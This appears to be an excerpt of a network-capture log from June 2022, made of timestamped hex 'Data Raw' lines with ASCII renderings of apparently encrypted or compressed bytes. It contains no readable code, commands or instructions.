                                                                                                                                                                                        2022-06-10 05:52:17 UTC138INData Raw: 14 c5 f4 23 b1 5a 60 14 c0 4b f9 38 3f 27 ff 23 48 a2 03 97 92 41 a8 2e 67 5d 50 6d 3d 0f 17 ce a0 67 07 3a 9b 84 e2 fc 78 e3 b7 71 d5 3a f8 03 6e 0b a8 a6 0c 18 bc 81 ec f1 3d 5f ee c3 61 93 a0 64 18 88 72 79 b4 2a 40 f9 3b 25 0b eb b2 14 fd 2b 5e 55 38 a9 82 9f b2 7a e6 3e 17 90 47 df ea 26 23 e1 80 a2 08 bb a1 21 16 c3 6c f3 7d 7e 93 82 aa 60 8b ba 8e 69 d6 5f e1 f4 0b 00 7a 04 dc c9 7f ec 2e 78 1e c9 fb e5 65 5a be fb 75 06 69 e5 90 e7 95 f3 61 4a 7d d6 33 f3 4b e6 20 06 62 6c bb 24 84 b2 94 68 48 a0 c1 da ec 58 bc 99 84 da a4 07 2d 94 13 ba 79 b6 7a fd 01 92 64 fe 8d 50 07 fa 6b f1 d4 cc 98 7e 99 64 c5 f2 de ba 5b c7 90 fb bb e1 dc b7 c4 27 ec 6d 85 79 bf ed aa bf 83 0e 33 d1 ac 90 b9 6b 00 da 6e 8f ef 17 a3 3e fe e2 68 91 74 2b 18 da 72 da 53 f5 84
                                                                                                                                                                                        Data Ascii: #Z`K8?'#HA.g]Pm=g:xq:n=_adry*@;%+^U8z>G&#!l}~`i_z.xeZuiaJ}3K bl$hHX-yzdPk~d['my3kn>ht+rS
                                                                                                                                                                                        2022-06-10 05:52:17 UTC140INData Raw: 6a 6a 05 7a 44 c3 d4 6c d5 7c 37 26 d2 33 57 61 13 7c 8b da 54 13 0b a9 04 f0 19 4c 4d 55 0c 6d d3 43 d7 a1 52 2a c5 92 9b e1 b3 88 92 1b e7 55 c6 b7 f7 d7 ef 4d 6c af 2a 68 1e f7 d3 da a6 54 47 13 de ee 78 cd 58 bf 29 68 98 dc 65 eb 6a 58 77 4b 64 c3 5c 95 4e 25 f5 57 d3 14 d4 e0 91 b6 5c 51 b6 4d fa d0 55 6c 60 ca 68 ce 05 ca 02 03 d8 0b 3e e7 68 4d 03 75 c1 93 07 68 18 b1 77 ae 06 e1 1e 66 a2 cf 39 99 da 6a 5e 99 06 c2 17 3a 1e 9b 85 3b 99 d9 1a c6 2f 6b fd ec c1 70 11 33 7e 8f 9d 7b ab 80 55 30 9c 8e e7 39 97 14 9c 1e d0 93 e1 e1 ae 9e af 3b 4f 78 eb 92 16 d5 14 0a d4 12 34 0d b1 43 4a c8 3d c5 c6 1e b3 0a b8 f2 f8 00 4e 35 d7 cc 9d 12 c9 74 7a 12 c1 e6 63 33 b5 fa 7d 10 f0 4b 82 07 9f 7b fc 87 4d f7 54 75 cf 20 86 5c 18 db 3b bf 25 ef b0 a6 c8 20 75
                                                                                                                                                                                        Data Ascii: jjzDl|7&3Wa|TLMUmCR*UMl*hTGxX)hejXwKd\N%W\QMUl`h>hMuhwf9j^:;/kp3~{U09;Ox4CJ=N5tzc3}K{MTu \;% u
                                                                                                                                                                                        2022-06-10 05:52:17 UTC141INData Raw: d6 62 b9 de 5e 86 e1 de bd 32 7d 02 1a e9 d3 39 da e8 ff 10 1d 74 d0 46 42 5f e3 b7 a3 e5 90 5f 7f 9d 84 89 97 bd 91 bd c0 06 4b e8 03 b2 57 cb bc 09 3c c5 a8 b3 fc 2b 92 a9 32 b7 0a 99 60 fd 54 a7 59 83 4b 8b 52 0f 03 18 16 d6 2a c4 4a 32 ff c7 fc f2 51 17 d7 28 7c fb e8 14 b1 5c 44 10 d7 44 69 73 16 ac 7b f3 78 8a 70 f8 9b 9c ca ae 76 d7 8b 61 ba 23 3d ee db 6b b5 9c c3 53 b5 23 99 02 61 61 d2 7f 1e f8 e4 fd 67 4e c7 1e d0 83 3e db a8 e4 57 d4 15 47 2d f9 d2 26 fd bc 1b 7d 1c b4 9f ae 5b 6a 17 6a ef f7 7f 9a 45 69 d8 00 8c f8 a2 b1 cd d8 3c 98 3e 4c 51 ca 18 9c 79 c9 fd b3 10 af 65 61 40 7c ad 43 c6 3e ca 7a be 5c 0b f7 d6 3a 73 d2 0f 89 b3 c9 2a 2d d9 11 3f 69 f8 3a 91 7b 87 41 14 75 e7 b4 fc e3 de f9 7d 8c 10 ab ce 0d 3c 81 4f 1a be 39 1d 97 ce 1b 4f
                                                                                                                                                                                        Data Ascii: b^2}9tFB__KW<+2`TYKR*J2Q(|\DDis{xpva#=kS#aagN>WG-&}[jjEi<>LQyea@|C>z\:s*-?i:{Au}<O9O
                                                                                                                                                                                        2022-06-10 05:52:17 UTC142INData Raw: a5 d0 5a f6 04 8a 35 5c 77 f0 23 8d b3 9b 80 de 2a 04 c4 49 a6 e7 24 84 b4 05 2c c4 07 f0 24 d5 05 3d 19 68 2a 7c 1e 3e 60 0a a5 50 de 68 17 ce f7 c8 0d 07 47 84 e4 38 2e 2f 1a 87 56 92 87 aa 4a 98 6f 1c 33 62 09 24 ac 54 6b b1 ae cf bf 06 a3 80 62 22 55 7b 2e 0c c4 10 ab 2a a0 4e 15 2f ec f1 24 ac f7 8c 73 36 27 ae 00 a7 fe 51 66 fb 16 c3 97 c8 8a 86 96 7a 38 2e 1b 8b ee a3 07 83 f8 66 1a 26 c4 f8 99 9b 72 ee 90 df 97 ca 99 2a 2b 04 84 86 65 3d ac 87 b3 41 71 7a e3 f6 37 9e c8 82 b3 16 ec 46 e9 70 23 ac cf a7 f7 26 2f fc 80 38 cb 39 e5 fa 43 57 78 d4 c4 3c 72 19 3b ed 93 a3 f3 b9 dc 85 97 de 69 38 5d 2e 08 02 88 b4 06 ad 19 6f 0b d9 87 93 1e 95 64 54 52 49 35 bb 30 fe 15 07 1f 97 8e 5c eb 1d e3 fd 08 8f e2 29 e8 0f a6 7f be ca 4b 20 42 d0 ef bf a6 04 9c
                                                                                                                                                                                        Data Ascii: Z5\w#*I$,$=h*|>`PhG8./VJo3b$Tkb"U{.*N/$s6'Qfz8.f&r*+e=Aqz7Fp#&/89CWx<r;i8].odTRI50\)K B
                                                                                                                                                                                        2022-06-10 05:52:17 UTC143INData Raw: 1e 0b c9 41 3e c3 54 6b 5a 48 aa c7 4f 60 dd 9c 2a 7c 16 c9 69 69 96 63 2d 2f 8f 2f cb 2a 1f f2 30 34 4b a3 10 4f b9 f4 c7 07 c6 09 f8 5a d7 de a0 65 73 f4 78 98 02 3b 59 42 d5 fc 74 e0 16 95 bc 0d 45 c7 95 b9 20 35 b8 0f a3 91 85 49 76 45 8c 2d 6d e0 13 7b 78 a1 cc 83 3c fb 9d 74 d0 e2 a5 00 1d b4 e1 0d d3 06 3c a8 18 59 74 14 db bd 79 06 09 2d ae a0 1d 1e d2 94 81 63 a2 7f 72 22 3d c2 f0 ef ae 9c 9d 45 21 90 93 6e a7 d6 22 4a 26 0b b0 38 71 6b b1 5f df 80 ce 5c 4b ef 35 5c 87 4d 3c a9 7e bb c3 01 65 68 b1 d1 74 9c 73 15 74 d2 c6 31 4f 77 97 d5 dd cb 59 33 78 42 ab 1f 78 33 be 7d 5a b0 d3 a0 f5 b9 07 59 fd 37 53 15 54 48 6c 89 de 05 19 41 7a bf 5d c1 39 83 b8 91 49 8a 83 8c e2 55 1c ea d1 16 cb 31 27 a1 ac 37 9e 2f cc 83 fe 4b 91 c0 0b d2 19 11 96 db 7a
                                                                                                                                                                                        Data Ascii: A>TkZHO`*|iic-//*04KOZesx;YBtE 5IvE-m{x<t<Yty-cr"=E!n"J&8qk_\K5\M<~ehtst1OwY3xBx3}ZY7STHlAz]9IU1'7/Kz
                                                                                                                                                                                        2022-06-10 05:52:17 UTC145INData Raw: 03 e5 c8 60 14 e8 1c 2d db 27 91 f8 31 d5 89 86 e3 71 ac ff a1 9a 30 60 a0 c7 ac 0e 93 81 fb d6 a1 dd 85 8c 7b 56 f9 a9 e7 8c 8c 2a d9 e5 15 11 76 b0 f5 94 80 bf be 6e 63 d3 43 20 d1 55 88 26 3c c8 0d 1f 00 e0 16 e6 15 a9 29 19 63 ef 13 8e d1 ce 3e f9 36 4a cf e1 53 e2 39 32 ca cf 2d 17 59 0f c6 ba e2 82 b3 fb ce f7 a4 d7 ee 0d ec ae 58 ec f9 e4 12 ff 8d ff 6b 25 1c 76 01 35 77 4f 92 f5 af 6a 58 4d c7 15 a6 ea 74 b8 18 fb 1e e7 0e 26 76 6b ec 85 3c 25 38 d0 bf 60 25 5d ab 9c 7e 9b 5e 9b 7b 00 40 a4 8d b3 09 7e fc 6a 54 79 3e be c4 9c 0f 8e a1 17 4c b6 a4 32 0c 35 ef 63 6b ad cf b9 0c 7d 43 80 bb 47 81 7a ad d7 37 3a 35 0c 93 5d 0a db 9a 6c 38 78 a3 9b 42 83 bc 62 c5 a9 87 71 aa 0d 7c 6d ff 84 7b 26 a6 7e b7 e2 d0 8f 0f cf 8a 73 0a 05 b4 3a 55 b4 f4 e1 1d
                                                                                                                                                                                        Data Ascii: `-'1q0`{V*vncC U&<)c>6JS92-YXk%v5wOjXMt&vk<%8`%]~^{@~jTy>L25ck}CGz7:5]l8xBbq|m{&~s:U
                                                                                                                                                                                        2022-06-10 05:52:17 UTC145INData Raw: 62 8c f2 67 4e 37 11 09 a2 2a 5d 2b f8 91 04 ad c3 9d 05 e1 3d f5 0a 82 9b 00 33 07 a9 ad 74 49 8e 71 2c bb 9e e4 e8 2e 96 f6 04 ee 17 12 7a 93 be 0b 30 87 0c be f8 ff ab c2 e2 99 ca fe 3b 4d a7 b6 33 c9 d6 bc fd 13 87 b2 16 13 22 8b 9c cf a8 22 b2 f1 a6 95 a6 5a b2 63 0e 9f 8d 65 f1 ad 00 2b 57 97 d1 59 1f 74 b2 96 ce d4 8a 69 08 05 ae 08 82 6e bc e4 4b 5e bb ab c5 84 2f ba 5c 59 6a 63 a8 88 e9 df d2 a7 cb db d8 0b 2a 70 e6 80 3c 76 aa 3e 18 69 8d 72 a6 ae 3c 50 63 42 70 08 8f 9f 8c 4a cb bc af f5 95 1d 04 ee 27 6d 34 3a f3 71 a4 e9 91 44 ed 68 8f 64 af b0 8f 6b 45 b8 18 d2 63 da 92 74 19 cd a1 24 22 11 c8 4d ed 93 25 52 a7 e1 a9 4b 51 c4 c6 3d f4 be 7e cc 81 40 64 70 af 9e c4 99 80 38 31 83 78 60 b8 01 0c 73 76 ce 05 7f 6f d3 80 8e c8 06 f8 53 e4 97 1f
                                                                                                                                                                                        Data Ascii: bgN7*]+=3tIq,.z0;M3""Zce+WYtinK^/\Yjc*p<v>ir<PcBpJ'm4:qDhdkEct$"M%RKQ=~@dp81x`svoS
                                                                                                                                                                                        2022-06-10 05:52:17 UTC147INData Raw: 1b 52 71 1f 0b a0 04 fb a3 e5 70 9e fc c6 be 8c 7e 44 3f 36 29 71 44 7c bd cb 13 60 0a 0b 74 ed a3 07 62 df 19 06 9d 43 2b e6 57 dc b4 c7 11 bf 8c 2c 9b fe a1 51 0f f2 81 a3 8f 30 d5 79 1b d5 59 d9 19 fc 3c 17 d1 36 ea 4b 8a c1 0d 3d 4e 38 e7 88 f7 32 48 46 69 74 5f 91 7e 88 f4 e4 da 49 6d b4 8a 7d 5d 8c 6c bb 28 55 2e 80 bc 80 3c 56 b8 d7 1d 02 18 23 98 79 d7 54 aa fe fc 4e 7b fd 30 3a bb 67 d3 62 5d a3 39 55 c7 70 cb e3 49 ba 85 c6 d0 7b a4 6d a1 9a 83 f1 6d 55 b8 28 16 30 e6 26 be dd 81 55 81 29 4c 7a 67 22 aa 9e 31 b6 66 67 82 55 4f 02 88 4d 58 22 36 cb 57 78 46 5b a2 76 0c df d1 68 48 0c f7 50 6a 15 a9 ed 80 c7 04 44 aa 3d 8e 0f 2a 95 63 4a 69 6c ab 41 3b ed 0f 30 30 11 db ec 30 16 3a c0 35 52 69 67 98 29 fe b5 73 52 bc 6c 0d 87 33 22 d9 ce 09 b0 e2
                                                                                                                                                                                        Data Ascii: Rqp~D?6)qD|`tbC+W,Q0yY<6K=N82HFit_~Im}]l(U.<V#yTN{0:gb]9UpI{mmU(0&U)Lzg"1fgUOMX"6WxF[vhHPjD=*cJilA;000:5Rig)sRl3"
                                                                                                                                                                                        2022-06-10 05:52:17 UTC148INData Raw: 9c df 7b b9 68 c5 79 91 69 d3 3b 1f 70 8a c5 16 bb 29 35 79 37 9b df 01 1d ed 8a fa 65 0a 00 c3 c9 b9 3c 00 0a f5 24 e7 32 7a 32 ef 45 87 69 eb 0f 14 c4 b4 14 7d a5 5f 07 46 05 30 72 7f fe 93 5b d3 93 78 51 47 7d d9 24 af 04 83 73 ee f1 95 9e 51 db 91 bc d4 84 d1 61 35 9c f7 70 64 eb 95 9f 27 4c 60 e8 f7 cf 3c ed 07 1e cd 72 1b e5 63 62 84 24 f9 0c 2a 2b d2 cf c4 4f cd 6d e6 13 3e 88 c7 8f 20 72 72 92 aa 74 93 da 00 7d cc 24 e2 b7 01 3c 24 21 3b 82 f6 94 d5 0e 43 80 9b e5 45 c1 af 9a fc af 8d 7a 59 d2 25 d7 c1 b9 9d 53 d6 a6 3b 33 08 73 ca 92 c7 18 33 4b 93 e2 c7 80 2e 8b 0b a1 15 d3 23 f3 6a 63 42 61 01 ff 26 f9 72 3e c9 e9 0b 75 d2 83 78 aa 34 fb 63 1f 5e 68 aa b8 5b 9c 7b 0d 40 75 c8 ac c8 8c 1d 1f c0 93 a5 af 43 fb 03 35 de 77 b9 ef eb d3 d7 4b 3e 84
                                                                                                                                                                                        Data Ascii: {hyi;p)5y7e<$2z2Ei}_F0r[xQG}$sQa5pd'L`<rcb$*+Om> rrt}$<$!;CEzY%S;3s3K.#jcBa&r>ux4c^h[{@uC5wK>
                                                                                                                                                                                        2022-06-10 05:52:17 UTC149INData Raw: e1 fd 9c 29 6a 81 65 3e 8a 06 29 63 60 c0 ea f2 21 4f 4c 1e e8 65 9b 50 8e 8f 92 1d 25 62 6c 98 d4 4f dd 37 2b 4b a4 5a 05 5b 6a c6 6e 55 3d 5a 86 a2 c0 5c 09 42 fd 01 85 30 55 17 b8 48 7b d9 ab 60 e4 9b 94 2a 0c f0 57 5f bb c6 e3 a4 1f 35 cb 7d 32 2d 84 2f a8 82 ef 9c d0 ac ee d7 b9 ba 75 3f 27 d4 c9 fb e2 f7 05 d7 f6 1e 9a 6e 10 60 ae 6f 74 90 b0 43 25 90 bd 0e e9 28 51 cf 16 3e 3c 24 b4 fb f6 64 90 56 bf 7b 6b de 7b b5 36 b4 c2 cb b5 84 3c 27 28 c7 68 45 12 4c 50 9f c3 18 c0 18 9e 2d f8 08 f3 74 74 0d bc 71 2a 3b b2 34 30 69 57 de fa 58 cb f0 10 09 b3 2c d5 13 2c a1 24 53 37 b1 95 73 72 18 84 f0 4d cf 71 ab ba 66 a8 ca 29 fa 75 4a 6b af 90 2a fa a0 08 7c 89 98 fd fb b4 fe fe ad 19 a3 49 57 7b 2c b4 81 2c e5 b8 4c 28 4c a0 45 d7 18 ed 1c 27 73 b7 44 47
                                                                                                                                                                                        Data Ascii: )je>)c`!OLeP%blO7+KZ[jnU=Z\B0UH{`*W_5}2-/u?'n`otC%(Q><$dV{k{6<'(hELP-ttq*;40iWX,,$S7srMqf)uJk*|IW{,,L(LE'sDG
                                                                                                                                                                                        2022-06-10 05:52:17 UTC150INData Raw: 24 8e bf d5 e4 74 e9 11 a0 ab 8c a6 e8 80 23 39 d7 a8 83 d6 aa d9 92 6a 8a 32 43 1f b8 c6 58 91 4c 50 bd 32 07 d5 67 d4 97 60 49 0b 48 5f e5 43 66 42 7f 08 5f 41 8b 32 90 b1 0e e5 46 7e 2d ca 1f 38 32 49 c7 36 53 9a 44 41 6b 76 e2 49 90 2b ac 93 ef 1e 43 58 d8 3e 2b 2e f2 4f 8c 26 8e d0 90 81 8b f5 69 09 fa e4 d9 ec f3 fb 70 af 54 fd 72 72 c5 bc 3b 1e 98 b6 3a d5 96 df 5a d1 d6 ac c3 ff 38 dc 27 2f 3a 98 5f 88 d1 4a 75 25 d1 f4 9e df 4d dc d9 f8 02 d7 df a4 26 37 32 d7 f8 6a 19 a3 9f 92 f8 ea 73 80 04 64 7b bf bd f2 b4 0a de 8a ae ea 08 ab 76 0e a5 ef 85 3c c2 19 27 a6 d6 e0 d1 d3 46 6c 25 fa d5 d4 ef 1a c7 d6 bd 6f 02 1f e1 7f 50 43 d0 d0 13 70 0c 3d 44 b3 74 90 ef b8 77 92 13 47 66 b5 3c 86 f2 2e ed e5 61 c8 71 76 ec a1 c5 c3 8c ef ee 3c a4 99 93 38 38
                                                                                                                                                                                        Data Ascii: $t#9j2CXLP2g`IH_CfB_A2F~-82I6SDAkvI+CX>+.O&ipTrr;:Z8'/:_Ju%M&72jsd{v<'Fl%oPCp=DtwGf<.aqv<88
                                                                                                                                                                                        2022-06-10 05:52:17 UTC152INData Raw: c8 48 93 c0 cb 7c e0 75 a2 a7 2f 4b 14 19 ed 13 31 45 17 e4 35 e8 b0 8b 95 07 a4 96 97 d9 1b 0c 08 a3 cd 57 a3 1c a3 ab 60 9e 29 53 4b 8e 03 81 f0 49 51 76 c0 a2 a3 6c bf 88 16 47 e3 eb 1c 68 bf f7 fa 12 7a 07 3f 59 98 ea 71 96 22 9f 9b 26 b7 83 28 3f 13 ba d4 f9 7f 71 9e 8e a1 49 b3 71 d1 96 d6 7a e5 62 d1 7c 54 39 7f 62 5d 3b 94 ac 8d 0e cd ea 54 b1 70 c3 54 9c fa 60 03 30 95 88 2f c1 56 5b 3f 96 03 13 2f aa 54 27 8b 47 2f 16 46 77 e6 53 d1 1c bc 25 8a cd 4d b5 f0 1b 97 68 57 b2 7a 42 30 bb 4e ee ec 5b 86 ce 07 3a c1 7a 97 e1 a3 18 6e 58 c6 a4 d0 9f 8c de 6b e1 4d d2 04 ea 7c e8 39 61 90 74 29 da 6e 62 60 5e 32 ba 18 92 70 98 1f 89 f8 d7 6a a9 85 99 78 51 f8 b5 d6 13 bf 41 38 25 e6 d8 0c 23 f0 7f 25 a1 62 0e a8 78 e8 7a b1 e3 98 f8 fe 14 b1 68 2d e3 ad
                                                                                                                                                                                        Data Ascii: H|u/K1E5W`)SKIQvlGhz?Yq"&(?qIqzb|T9b];TpT`0/V[?/T'G/FwS%MhWzB0N[:znXkM|9at)nb`^2pjxQA8%#%bxzh-
                                                                                                                                                                                        2022-06-10 05:52:17 UTC153INData Raw: 21 79 54 7f d6 74 e8 72 26 81 8e 08 47 fd 5c 51 d2 a3 c0 36 f0 4f f3 61 4a cf 3d da b0 fc 81 81 a5 ca 77 26 4d ec 16 d0 c1 21 08 a5 6d 85 8b 3c c2 ca b6 93 00 8b e1 5d 71 df 90 36 a1 23 21 19 cd 81 ae 84 cf 2f c9 04 4e 5f 7a e2 3e 99 ab 15 43 57 6e a5 89 e0 4e 89 57 70 45 71 9f ac 64 5d b0 4a cd 20 32 de d0 4c 91 29 75 fb 23 60 81 a2 3c 71 a9 3d 5a 09 0c 6b d1 56 cd ef 48 d0 06 96 dd 1b 02 39 f2 6b 52 8d 8f 8e 26 e8 be 43 01 1f 69 0e bd 32 a5 87 0c 18 d5 65 15 ad 45 24 64 42 94 62 13 eb ea 69 c0 27 cb 1e be 36 2e 20 0c a3 fd 6c 10 6a b9 08 0f af 62 e7 24 72 fe 7d 0b 96 f5 ed 5a ba 26 a2 90 9a 9e e1 62 69 9d 29 e3 4b 9e 7b 72 bd 08 01 88 7c ad 1f b6 6a f6 3f 10 49 64 64 88 62 7b 79 d9 cd 16 1d 73 e7 af f0 4a 34 8b 08 38 7a 24 4e b3 1b d0 97 12 7b 16 03 38
                                                                                                                                                                                        Data Ascii: !yTtr&G\Q6OaJ=w&M!m<]q6#!/N_z>CWnNWpEqd]J 2L)u#`<q=ZkVH9kR&Ci2eE$dBbi'6. ljb$r}Z&bi)K{r|j?Iddb{ysJ48z$N{8
                                                                                                                                                                                        2022-06-10 05:52:17 UTC154INData Raw: a7 0f c9 cd db a5 a5 5c 56 89 6c c1 0b aa ec 3c 93 df 61 6e 53 40 67 35 72 a5 34 f1 80 24 42 ea 19 e2 10 f5 d4 d2 e3 6b 4f cf ee 94 ab 82 88 b2 57 4e 65 e1 bf 5f 00 ee 7c 08 cc 68 20 dc a9 4f ee 1e 83 5b c8 a4 9f 5d 89 b4 11 3e 6f c3 2e 70 b9 ec bd 37 fc a5 dd b2 b3 2a d1 0f 2e c5 ad e6 c1 04 01 a9 49 68 55 68 b4 ff 1a 24 65 4d 8a 5f 0d 1a 18 1b 35 bb 3f 61 da 52 51 5a 24 9b 03 25 76 d4 9d 8c 16 3e 87 60 f7 fc 47 d0 cb 9e 69 99 9c 15 47 51 b1 00 46 bc 26 59 c5 95 08 09 24 06 26 8b 42 8b 26 ec 86 00 75 39 a5 55 65 49 02 3d 86 a8 51 4b 4d e9 4c 75 6f 6c c2 54 4b b4 75 95 8b c2 56 ca c5 f5 2d 04 89 7e 90 59 33 30 96 4d 33 ea f2 cc 8d a1 bd f0 c4 45 44 1a c4 47 10 31 b8 5d e8 f0 b2 34 b1 11 c6 e1 08 d3 dd f4 fd 4f f3 77 c9 12 da eb 5e 9c f2 8b 84 1c 13 6b 60
                                                                                                                                                                                        Data Ascii: \Vl<anS@g5r4$BkOWNe_|h O[]>o.p7*.IhUh$eM_5?aRQZ$%v>`GiGQF&Y$&B&u9UeI=QKMLuolTKuV-~Y30M3EDG1]4Ow^k`
                                                                                                                                                                                        2022-06-10 05:52:17 UTC156INData Raw: 8e ce a7 71 ed 0e 7e 81 ff d1 2c d2 17 0b 1b 27 b3 7e 7e f7 45 fa 81 4a 8d 20 1d c8 f0 df 8f 53 a8 4a ee a0 29 ca dd e3 4b de bd 36 56 a3 f1 6c a1 cb 36 8b 9a 03 f8 e9 9f f2 0e 54 f6 cd 67 3b 41 46 78 53 29 19 3b 98 c4 66 66 d7 9a eb ac 9f bc 0e fd 82 33 d0 11 72 f7 0b b4 44 9f 3e 46 f1 bf f3 e5 51 9a 24 cb c3 5a d7 9c 40 e6 74 50 9b b8 e6 f6 b0 1d 4e 20 04 71 09 05 4f ff ff c3 05 cf a1 5d ec 7d 90 15 fe 3c 5d fd 97 20 4d e4 fc 82 10 fe 73 c4 ed 22 8a a3 dc d7 63 98 a6 75 5a 3c 33 04 3e 89 bc f5 1d be e7 9f c1 1d a8 28 ca 43 ca 6c 9b da e1 71 64 55 44 70 e0 6e c1 d9 19 dd 2e fc c6 db 78 00 66 f0 0a 9d b5 a2 3a 8e 50 1e 96 7d 7e 66 10 93 e6 c6 59 7b 93 5f 7a fc 5b 06 bd 94 5a d9 5f 72 0e e2 9d bf 69 fc 05 9a 83 bd 6e 0b 36 dd 3a 4e 33 1e 8d ae d7 05 80 59
                                                                                                                                                                                        Data Ascii: q~,'~~EJ SJ)K6Vl6Tg;AFxS);ff3rD>FQ$Z@tPN qO]}<] Ms"cuZ<3>(ClqdUDpn.xf:P}~fY{_z[Z_rin6:N3Y
                                                                                                                                                                                        2022-06-10 05:52:17 UTC157INData Raw: 63 68 71 1d 0e 9b 7c 13 8f 85 9d a4 8b 06 33 c2 ce ee 91 20 db 72 d4 04 10 f2 ad fb 08 f6 dd ec 21 01 ff 2e bc 58 f2 00 97 d6 05 2f f3 84 d2 2d b9 d3 d1 4b 09 1d 99 da 44 90 ce 9c ff d6 f4 4a 89 35 8c 0d 8c 78 57 f6 eb 46 f7 e3 28 4e cc 00 2d b9 47 5c d7 c9 33 b9 ff 8e 85 58 c3 9b 8b 47 c6 bf 52 34 68 e9 ac c0 39 fc 87 b9 e2 6a 3c ea 04 dc de e8 bd db af 48 2c ce d9 7d d2 8f 24 65 e2 47 b2 c0 cc 53 5d bb e9 71 c3 a2 2d db 31 38 c7 65 52 39 42 85 a6 d9 78 bc 9f c8 40 26 7c 6f 5d 9b 22 35 d1 67 21 30 c2 74 b9 98 d0 9b cd 2b 90 1c 0e d4 43 ff 00 21 16 9a 12 69 b9 38 20 b7 28 80 0a e1 b3 55 d9 65 cf 3a 78 63 05 fc ee 64 7d d0 f5 2d d0 c6 0e 84 04 e5 0a 1c 0a 3e 5c e4 cd be 02 b8 f5 21 5f 1a 14 f9 35 91 e1 42 e7 d4 d3 64 5c 5f 62 0e c4 3f 1a a2 4a 2f 25 bc 42
                                                                                                                                                                                        Data Ascii: chq|3 r!.X/-KDJ5xWF(N-G\3XGR4h9j<H,}$eGS]q-18eR9Bx@&|o]"5g!0t+C!i8 (Ue:xcd}->\!_5Bd\_b?J/%B
                                                                                                                                                                                        2022-06-10 05:52:17 UTC158INData Raw: f6 ea 97 d2 57 32 d1 9b 26 56 6f d5 6f d8 ec 3f f1 06 89 d0 53 44 6e 3a 56 19 e3 23 6b 0d a0 30 25 33 02 e5 f0 23 c5 0a a1 2c 5a 67 03 3c d7 f0 88 60 ef b8 74 dd 64 d1 b1 b4 2c a8 82 81 6c e4 51 bc 49 14 b3 c5 ff 84 75 84 e1 eb 04 7d 7c 44 86 26 6c 27 44 26 fe 14 c8 e9 48 55 18 09 a3 02 65 d2 93 cb 60 65 68 14 fc d8 09 bb 0a df be fa d0 48 76 2d 06 5e 18 86 40 43 f6 24 22 5e bc b4 b0 3d 35 e6 1d 70 41 b2 29 60 0f 08 2e ce 0f eb 74 e1 f8 0b 94 0a ef c2 7c fb 88 ed 12 c9 ca 16 e3 41 82 ca d7 a0 8c 15 6e 03 1b d1 91 c1 da b3 56 81 90 47 d5 2b b2 97 f0 87 f2 a1 22 a5 74 44 8e 51 bc a8 3f fb ff 7d 0b 82 8b 2c 71 a8 b7 6b 52 16 0a 01 ab 01 9b eb 51 24 fb 9c 9b 76 b7 58 d4 93 36 0c e1 f0 b5 c5 bf a3 7e 52 ad c2 b2 11 63 8f 81 15 78 74 f4 92 34 c0 b9 c6 ca 65 94
                                                                                                                                                                                        Data Ascii: W2&Voo?SDn:V#k0%3#,Zg<`td,lQIu}|D&l'D&HUe`ehHv-^@C$"^=5pA)`.t|AnVG+"tDQ?},qkRQ$vX6~Rcxt4e
                                                                                                                                                                                        2022-06-10 05:52:17 UTC159INData Raw: de 4e b7 20 c7 3b e9 38 a9 4c ef 8c a4 5e c5 92 71 40 0b fb 9a 3a ee 5d da 89 03 13 06 89 4b cb 42 d7 36 2e f0 f7 74 c7 53 a0 46 01 92 5b 7f a7 14 91 f2 a1 73 a8 c2 f6 b3 5c 11 82 02 14 23 1f e5 14 b9 70 55 6e 75 0f b5 d3 12 07 7f 03 3e 01 63 40 74 27 41 3b ce 1f b7 f6 9d 22 2e d7 4c 0d 6f eb a3 fa c4 1a 6e 3a df 8f ad a1 eb 9c 8b b8 1e e4 c9 ea 98 7b 6d 55 6f 62 d0 47 40 76 3d 78 7b 6e b0 1d 3b 1f ef 13 25 3d 61 52 a8 37 69 42 87 4e 6c 16 32 45 a0 a3 fa 91 0f 20 fd 3a d2 17 24 42 30 3e ca fd 6f 44 fb cc 9b ab 6b 49 4c 85 6c 87 cf 00 f1 12 ae b7 2c 73 89 dd cd 23 42 56 06 aa 79 fd b4 7e af 4d f8 88 d6 8f 36 68 c2 11 0d d5 bf 3a 61 b6 45 80 09 aa 2a 9f 4d cc 0c 10 79 28 84 2e a5 1c bc d7 b9 4a 82 38 d0 46 8f a5 27 e6 c9 69 8b 81 c7 39 c4 6c 00 24 28 20 3e
                                                                                                                                                                                        Data Ascii: N ;8L^q@:]KB6.tSF[s\#pUnu>c@t'A;".Lon:{mUobG@v=x{n;%=aR7iBNl2E :$B0>oDkILl,s#BVy~M6h:aE*My(.J8F'i9l$( >
                                                                                                                                                                                        2022-06-10 05:52:17 UTC161INData Raw: c6 cf 48 a2 09 46 c4 a9 0d 8f 9a 63 e0 3a 38 99 36 be 8d db 90 f3 72 9d 06 f5 c4 28 87 08 46 f7 78 47 5f e8 c1 3f db bf 0b 33 12 68 95 98 57 30 ef ce 6e 67 bb 0d 65 bc c4 28 78 11 4b f7 35 23 16 b0 ac 46 95 57 65 a2 38 91 38 14 7b ba 10 27 80 da 90 df 79 43 10 0c aa b7 bc e2 5d b9 e0 76 f9 08 a8 3a ee 21 78 28 12 5e 7e 3e 6f d6 ea ad a7 d2 3e e9 e7 bf db 3e eb 29 df a7 46 33 99 30 3c 7d 0d 9a fc 84 ea 68 b8 0a dd f4 f4 cb 79 fc ca 97 78 f8 d2 fc 24 12 2b 6e ff c1 fd 08 12 a9 83 53 42 90 13 43 af 5c d1 14 de ea d8 8f 0d 4e 3b 2b 4b 51 47 3e 12 4d e1 bd 06 0e 43 50 bd 67 73 18 cd 95 b3 ab 90 a6 e3 6a 60 2d f1 c2 12 8b 53 72 72 44 39 6d 3d 2b 1f 8e dc 06 c6 9a 2e 39 66 c8 27 fe c9 fc 9f 5e c4 19 e3 35 32 63 84 d8 d1 84 ec bd 7b 0f b7 95 ef 0e 0b 98 71 fe 00
                                                                                                                                                                                        Data Ascii: HFc:86r(FxG_?3hW0nge(xK5#FWe88{'yC]v:!x(^~>o>>)F30<}hyx$+nSBC\N;+KQG>MCPgsj`-SrrD9m=+.9f'^52c{q
